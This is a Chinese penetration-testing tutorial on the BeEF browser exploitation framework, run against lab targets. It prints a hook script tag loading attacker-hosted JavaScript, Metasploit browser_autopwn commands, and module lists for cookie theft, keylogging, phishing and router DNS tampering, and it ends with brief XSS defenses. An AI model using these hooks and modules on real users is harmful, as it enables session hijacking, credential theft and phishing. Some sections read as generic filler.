xss漏洞原理(五)BeEF

简介: xss漏洞原理(五)BeEF

简介

image.png

BeEF(The Browser Exploitation Framework)是一款针对浏览器的渗tou测试工具。它集成了许多payload,可以实现多种功能,并支持API调用,用户可以编写自己的模块。在Kali Linux系统上,BeEF工具已经自动安装。

当我们打开BeEF时,会看到登录页面。该页面提供了两条信息:一条是BeEF的XSS引用地址,即本地IP的3000端口下的hook.js;另一条是BeEF的管理页面,即本地地址/ui/panel。

在当前Kali Linux系统上,BeEF已经开始监听3000端口。我们可以访问BeEF的管理页面,并使用默认的用户名和密码(beef)登录。

总结起来,BeEF是一款功能强大的浏览器渗tou测试工具,可以用于学习和交流目的。但请注意,严禁利用该工具进行非法行为,否则后果自负。

功能

信息收集

image.png

BEEF(Browser Exploitation Framework)是一个用于浏览器漏洞利用的框架,它可以用于信息收集、网络钓鱼、会话劫持等公鸡。下面是使用BEEF进行信息收集的步骤:

启动BEEF:在终端中切换到BEEF所在的目录,并运行以下命令启动BEEF:

cd /usr/share/beef-xss/

./beef

1.

2.

配置BEEF:在浏览器中访问http://localhost:3000/ui/panel,进入BEEF的控制面板。在控制面板中,你可以配置BEEF的各种设置,包括监听地址、端口、HTTPS证书等。

创建钓鱼页面:在BEEF的控制面板中,点击"Modules"选项卡,然后选择"Phishing"模块。在该模块中,你可以创建钓鱼页面,用于诱骗目标用户输入敏感信息。

发送钓鱼链接:将生成的钓鱼页面链接发送给目标用户,诱使其点击并输入敏感信息。

收集信息:一旦目标用户点击了钓鱼链接并输入了敏感信息,BEEF将会收集到这些信息,并在控制面板中显示。

请注意,使用BEEF进行信息收集等活动可能涉及到违法行为,且可能对他人造成损害。请确保你在合法授权的范围内使用BEEF,并遵守相关法律法规。

持久化控制

image.png

BEEF(Browser Exploitation Framework)是一个用于公鸡浏览器的框架,它可以帮助公鸡者获取对受害者浏览器的控制权。在获得对僵尸浏览器的初始化控制后,持久化控制是非常重要的,以便为后续的公鸡提供更多时间。

持久化控制主要包括两个方面:持久通信和持久存续。

持久通信:持久通信是指BeEF服务器和僵尸浏览器之间的通信技术选择。高级的通信技术可以提供更快的速度。BeEF使用各种通信技术,如AJAX、WebSockets和长轮询等,来确保与僵尸浏览器之间的持久通信。

持久存续:持久存续是指让用户尽可能地停留在具有BeEF勾子的页面上。这可以通过多种方式实现,例如:

诱使用户点击链接或按钮,以防止页面跳转到新页面。

使用JavaScript代码来阻止页面关闭事件,以便用户无法关闭页面。

使用各种技术(如IFrame、弹出窗口等)来打开新的浏览器窗口,以便用户保持在具有BeEF勾子的页面上。

需要注意的是,持久化控制也有一些限制和缺点。例如,无法加载图片和某些特定的页面操作(如点击导航菜单中的链接)可能导致页面跳转,从而失去对浏览器的控制权

社会工程

image.png

BeEF(Browser Exploitation Framework)是一个强大的开源渗tou测试框架,它可以用于进行社会工程公鸡。通过BeEF,公鸡者可以利用浏览器漏洞来获取目标用户的浏览器信息、键盘记录等敏感信息。

下面是一个使用BeEF进行社会工程公鸡的示例:

首先,你需要安装和配置BeEF。你可以从官方网站(http://beefproject.com)下载BeEF,并按照官方文档进行安装和配置。

一旦安装和配置完成,你可以启动BeEF服务。

接下来,你需要获取目标用户的浏览器连接。你可以通过发送钓鱼邮件、社交媒体欺骗等方式来引诱目标用户点击恶意链接。

当目标用户点击恶意链接并访问了你的BeEF服务器时,你将能够在BeEF控制台中看到目标用户的浏览器连接。

一旦你获得了目标用户的浏览器连接,你可以利用BeEF的各种模块进行社会工程公鸡

。例如,你可以使用键盘记录模块来记录目标用户的键盘输入,者使用浏览器信息模块来获取目标用户的浏览器版本和操作系统信息。

需要注意的是,进行社会工程公鸡是违法行为,重侵犯了他人的隐私和安全。请确保你在合法的环境中使用BeEF,并遵守相关法律法规。

image.png

BEEF(The Browser Exploitation Framework)是一个专注于利用浏览器漏洞的Web框架公鸡平台。它可以用于合法的研究和测试目的。通过BEEF,公鸡者可以利用浏览器漏洞来获取目标主机的用户名和密码,甚至可以获取目标主机的shell访问权限。

BEEF的使用方法如下:

首先,你需要安装和配置BEEF。你可以从BEEF的官方网站(https://beefproject.com/)下载最新版本的BEEF,并按照官方文档进行安装和配置。

安装和配置完成后,你可以启动BEEF。在启动BEEF之后,它将监听一个特定的端口(默认为3000)。

接下来,你需要诱使目标用户访问你的恶意网站。你可以通过发送钓鱼邮件、社交工程等方式来引诱目标用户点击你的恶意链接。

当目标用户访问你的恶意网站时,BEEF将会自动检测目标用户的浏览器漏洞,并尝试利用这些漏洞。

如果成功利用了浏览器漏洞,BEEF将会建立一个与目标用户浏览器的连接,并提供一系列公鸡

模块和功能,包括获取目标主机的用户名和密码,以及获取目标主机的shell访问权限。

需要注意的是,BEEF是一个强大的工具,但在使用时必须遵守法律和道德规范。只能在合法的研究和测试目的下使用,不得用于非法活动。

基础使用

启动服务  

图形启动

image.png

点击Kali Linux BeEF图标

这里还是需要手工启动Apache服务

故障解决  

命令启动

image.png

root@kali:~# service apache2 start

root@kali:~# cd /usr/share/beef-xss/

root@kali:/usr/share/beef-xss# ./beef

[*] Please wait as BeEF services are started.

[*] You might need to refresh your browseronce it opens.

[*] UI URL: http://127.0.0.1:3000/ui/panel

[*] Hook: <script src="http://<IP>:3000/hook.js"></script>

[*] Example: <script src=" http://127.0.0.1:3000/hook.js"></script>      

Hook脚本  

<script src="172.16.70.216:3000/hook.js"></script>  

这里的IP地址172.16.70.216即启动了BeEF的主机  

登录BeEF

image.png

账号密码beef/beef  

检查脚本

渗tou机器上访问"本机地址:3000/hook.js",保证 能看到公鸡脚本  

image.png

靶机测试

环境地址说明

image.png

将脚本放在Mutillidae靶机中

image.png

image.png

说明

在chrome下执行这段脚本,会出现安全拦截报错,建议用ie或者firefox  

<script src="172.16.70.216:3000/hook.js"></script>  

将脚本放在DWVA靶机中

由于这个页面存在字数限制,所以需要修改前端代码  

例如Firebug来修改  

在Windows 7访问此XSS页面

image.png

访问之后上去也没有任何异常,但此时的脚本其实已经运行了  

除了WIN7访问这个页面,Kali 自己刷新页面,也会自己上钩  

说明

image.png

IE不行的话,再用Chrome访问

在BeEF页面,可以看到肉鸡上线

image.png

只要肉鸡浏览器不关闭,这里就可以一直控制它  

整个过程,对于肉鸡来说,没有发现有任何问题  

服务管理

命令帮助

image.png

BeEF是一个用于浏览器漏洞利用的框架,它可以帮助安全研究人员测试和演示各种Web浏览器的安全漏洞。下面是一些常用的BeEF命令和其功能:

beef-xss: 启动BeEF框架。

beef: 启动BeEF控制台。

beef -h 或 beef --help: 显示BeEF命令的帮助信息。

beef -v 或 beef --version: 显示BeEF框架的版本信息。

beef -c <config_file>: 使用指定的配置文件启动BeEF框架。

beef -p <port>: 指定BeEF框架监听的端口号。

beef -s: 启动BeEF框架并在后台运行。

beef -x <command>: 执行指定的BeEF命令。

你可以使用上述命令来启动BeEF框架、控制台以及执行其他相关操作。更多关于BeEF框架的详细信息和使用方法,你可以参考BeEF框架的官方文档: https://github.com/beefproject/beef/wiki

开启服务  

image.png

以下是开启BeEF服务的步骤:

首先,确保已经安装了BeEF。如果还没有安装,请按照官方文档或相关教程进行安装。

打开终端,并输入以下命令来启动Apache服务:

sudo service apache2 start

确保Apache服务已经成功启动后,再输入以下命令来启动BeEF:

sudo beef-xss

当看到类似于以下信息时,表示BeEF服务已经成功启动:

复制  

[INFO]  BeEF is running at: http://127.0.0.1:3000/ui/panel

请注意,BeEF默认监听在本地的3000端口。您可以在浏览器中访问上述URL来打开BeEF的控制面板。

重置数据库

image.png

如果您想要重置数据库,可以使用MySQL的命令行工具或者图形化界面工具来执行相应的操作。以下是使用MySQL命令行工具重置数据库的步骤:

打开命令行终端或者命令提示符。

使用以下命令登录到MySQL数据库:

mysql -u 用户名 -p

其中,用户名是您的MySQL数据库用户名。执行该命令后,系统会提示您输入密码。

输入密码后,按回车键登录到MySQL数据库。

使用以下命令选择要重置的数据库:

USE 数据库名;

其中,数据库名是您要重置的数据库的名称。

使用以下命令删除数据库中的所有表:

DROP TABLE 表名1, 表名2, ...;

其中,表名1, 表名2, …是您要删除的表的名称。如果要删除所有表,可以使用以下命令:

SHOW TABLES;

该命令会显示数据库中的所有表,然后您可以逐个删除这些表。

重置数据库完成后,您可以重新创建表和插入数据。

请注意,重置数据库将删除数据库中的所有表和数据,因此请谨慎操作并确保您已经备份了重要的数据。

关闭服务

image.png

root@kali:~# service apache2 stop  

root@kali:/usr/share/beef-xss# service beef￾xss stop  

使用方法

信息收集

目标详情(Detail)


image.png

image.png

image.png

以前抓肉鸡,需要各种灰鸽子、冰河木目马等后门 程序,配合系统漏洞来实现

现在仅需要一个链接,就可以批量抓肉鸡,而随着社交网络、云计算机、Web应用的发展  

越来越多基于Web/浏览器的公鸡技术会出现,配合社会工程师和蠕虫,完全可以实现大规模的网 络公鸡

命令颜色(Color)

image.png

绿色 对目标主机生效并且不可见(不会被发现)

橙色 对目标主机生效但可能可见(可能被发现)

灰色 对目标主机未必生效(可验证下)

红色 对目标主机不生效  

浏览器(Brower)  

检测信息(detect)

image.png

检测浏览器类型

检测是否有firebug插件

检测是否有Foxit Reader插件

检测是否可以访问某个URL

检测是否允许访问摄像头  

获取信息(get)

image.png


获取cookie信息

获取表单信息

获取HTML

获取HREF             此页面的URL链接  

修改信息(replace)

image.png

修改链接

修改视频  

创建信息(create)

image.png

警告框create alert Dialog

对话框create prompt dialog  

重定向(redirect)  

image.png

重定向到目标网站  

目标网站可以设置为一个伪装的支付宝/网银/网游登录页面  

重定向并处于加载状态

实际上已经重定向到另外的网站了,但是为了伪 装,让页面处于加载状态  

重定向到iframe页面

实际上已经重定向到另外的网站了,但是为了伪 装,通过iframe页面将页面处于空白状态  

其他功能

image.png

主机(Host)

image.png


获取内部地址

检测是否在虚拟机里

hook其他浏览器  

网络(Network)

image.png

端口扫描

PING扫描

DOS公鸡

插件(Chrome Extensions)  

持久化控制

image.png


中间人公鸡  

用户点击其他链接,浏览器不跳,保留在原来页面  

关闭确认弹框

小窗口  

漏洞利用

本地主机(local host)

image.png

基于ms漏洞拿shell

win xp下测试

win7下测试  

基于ms漏洞获取shell的方法有很多种,具体的方法取决于具体的漏洞类型和系统环境。以下是一种常见的基于ms漏洞获取shell的方法:

首先,你需要找到一个已知的ms漏洞,可以通过漏洞扫描工具或者漏洞数据库来查找。

一旦找到了目标漏洞,你需要了解该漏洞的利用方式和公鸡

方法。这通常需要对漏洞进行深入研究,包括查找已有的漏洞利用脚本或工具。

接下来,你需要准备一个公鸡

环境,包括安装必要的工具和软件。这可能包括渗头测试工具、代理服务器、漏洞利用框架等。

一旦准备好公鸡

环境,你可以开始执行漏洞利用。这可能涉及到发送特制的恶意请求、利用系统漏洞、绕过安全措施等。

如果漏洞利用成功,你将能够获取对目标系统的访问权限。这可能包括获取shell访问权限、提升权限、获取管理员权限等。

需要注意的是,进行任何形式的公鸡都是非法的,除非你有合法的授权和目的。在进行任何安全测试或渗头测试之前,请确保你已经获得了合法的授权,并且只在合法的环境中进行测试。

摄像头(Camera)

简介

基于CSRF(跨站伪造请求),修改网络摄像机的管理密码  

路由器(Router)

简介

image.png

基于CSRF(跨站伪造请求),假设目标用户已经登录了路由器,则可以执行以下功能

修改登录密码、关闭防火墙、开启远程管理(80/23)

修改DNS服务器、重启路由器

支持cisco、3com、huawei、TP-link等路由器

交换机(Switch)  

功能同路由器渗头模块类似  

Metasploit

Metasploit设置

image.png

使用浏览器载荷,开启监听端口,等待肉鸡访问  

Kali 的MSF需要解决数据库问题

update-rc.d postgresql enable 开启启动

service postgresql start 启动数据库

service metasploit start 启动msf

msfupdate 更新msf

msfconsole 进行msf

msf > db_status 检测数据库连接

apt-get install metasploit-framework 更新msf  

针对winxp和2003成功几率大

操作

image.png

MSF操作

msfconsole 进入MSF

search browser

_

autopwn 搜索浏览器模块

use auxiliary/server/browser

_

autopwn 使用模块

show options 查看配置信息

set LHOST 172.16.70.216  

设置本机IP

set SRVHOST 172.16.70.216  

set URIPATH / 设置后缀信息

exploit  

执行截图

BeEF设置

说明 让肉鸡访问Metasploit的监听地址  

社会工程公鸡 Social Engineering  

点击劫持

image.png

clickjacking  

谷歌钓鱼

image.png

image.png

Facebook钓鱼


image.png

image.png


虚假更新

image.png

image.png


其他功能


image.png

Rider  

Forge Request  

GET / HTTP/1.1

Host: bing.com

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8

Connection: close  

xss防御

image.png

1、Web客户端和服务端脚本对用户输入输出字符进行安全过滤和转义

<

>

script

htmlspecialchars  

2、Web服务器安装WAF/IDS/IPS等安全产品,拦截公鸡代码

image.png

image.png

image.png

3、浏览器设置为高安全级别,Cookie属性HttpOnly设置为true,防止被JS调用  

浏览器将禁止页面的Javascript访问带有HttpOnly属性的Cookie  

4、关闭浏览器自动密码填写功能,防止被钓鱼页面/表单调取账号密码  

可选

方便了用户,也让用户更加的危险



相关文章
|
24天前
|
弹性计算 人工智能 架构师
阿里云携手Altair共拓云上工业仿真新机遇
2024年9月12日,「2024 Altair 技术大会杭州站」成功召开,阿里云弹性计算产品运营与生态负责人何川,与Altair中国技术总监赵阳在会上联合发布了最新的“云上CAE一体机”。
阿里云携手Altair共拓云上工业仿真新机遇
|
16天前
|
存储 关系型数据库 分布式数据库
GraphRAG:基于PolarDB+通义千问+LangChain的知识图谱+大模型最佳实践
本文介绍了如何使用PolarDB、通义千问和LangChain搭建GraphRAG系统,结合知识图谱和向量检索提升问答质量。通过实例展示了单独使用向量检索和图检索的局限性,并通过图+向量联合搜索增强了问答准确性。PolarDB支持AGE图引擎和pgvector插件,实现图数据和向量数据的统一存储与检索,提升了RAG系统的性能和效果。
|
20天前
|
机器学习/深度学习 算法 大数据
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
2024“华为杯”数学建模竞赛,对ABCDEF每个题进行详细的分析,涵盖风电场功率优化、WLAN网络吞吐量、磁性元件损耗建模、地理环境问题、高速公路应急车道启用和X射线脉冲星建模等多领域问题,解析了问题类型、专业和技能的需要。
2577 22
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
|
18天前
|
人工智能 IDE 程序员
期盼已久!通义灵码 AI 程序员开启邀测,全流程开发仅用几分钟
在云栖大会上,阿里云云原生应用平台负责人丁宇宣布,「通义灵码」完成全面升级,并正式发布 AI 程序员。
|
3天前
|
JSON 自然语言处理 数据管理
阿里云百炼产品月刊【2024年9月】
阿里云百炼产品月刊【2024年9月】,涵盖本月产品和功能发布、活动,应用实践等内容,帮助您快速了解阿里云百炼产品的最新动态。
阿里云百炼产品月刊【2024年9月】
|
2天前
|
存储 人工智能 搜索推荐
数据治理,是时候打破刻板印象了
瓴羊智能数据建设与治理产品Datapin全面升级,可演进扩展的数据架构体系为企业数据治理预留发展空间,推出敏捷版用以解决企业数据量不大但需构建数据的场景问题,基于大模型打造的DataAgent更是为企业用好数据资产提供了便利。
163 2
|
20天前
|
机器学习/深度学习 算法 数据可视化
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
2024年中国研究生数学建模竞赛C题聚焦磁性元件磁芯损耗建模。题目背景介绍了电能变换技术的发展与应用,强调磁性元件在功率变换器中的重要性。磁芯损耗受多种因素影响,现有模型难以精确预测。题目要求通过数据分析建立高精度磁芯损耗模型。具体任务包括励磁波形分类、修正斯坦麦茨方程、分析影响因素、构建预测模型及优化设计条件。涉及数据预处理、特征提取、机器学习及优化算法等技术。适合电气、材料、计算机等多个专业学生参与。
1576 16
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
|
22天前
|
编解码 JSON 自然语言处理
通义千问重磅开源Qwen2.5,性能超越Llama
击败Meta,阿里Qwen2.5再登全球开源大模型王座
973 14
|
3天前
|
Linux 虚拟化 开发者
一键将CentOs的yum源更换为国内阿里yum源
一键将CentOs的yum源更换为国内阿里yum源
219 2
|
17天前
|
人工智能 开发框架 Java
重磅发布!AI 驱动的 Java 开发框架:Spring AI Alibaba
随着生成式 AI 的快速发展,基于 AI 开发框架构建 AI 应用的诉求迅速增长,涌现出了包括 LangChain、LlamaIndex 等开发框架,但大部分框架只提供了 Python 语言的实现。但这些开发框架对于国内习惯了 Spring 开发范式的 Java 开发者而言,并非十分友好和丝滑。因此,我们基于 Spring AI 发布并快速演进 Spring AI Alibaba,通过提供一种方便的 API 抽象,帮助 Java 开发者简化 AI 应用的开发。同时,提供了完整的开源配套,包括可观测、网关、消息队列、配置中心等。
734 9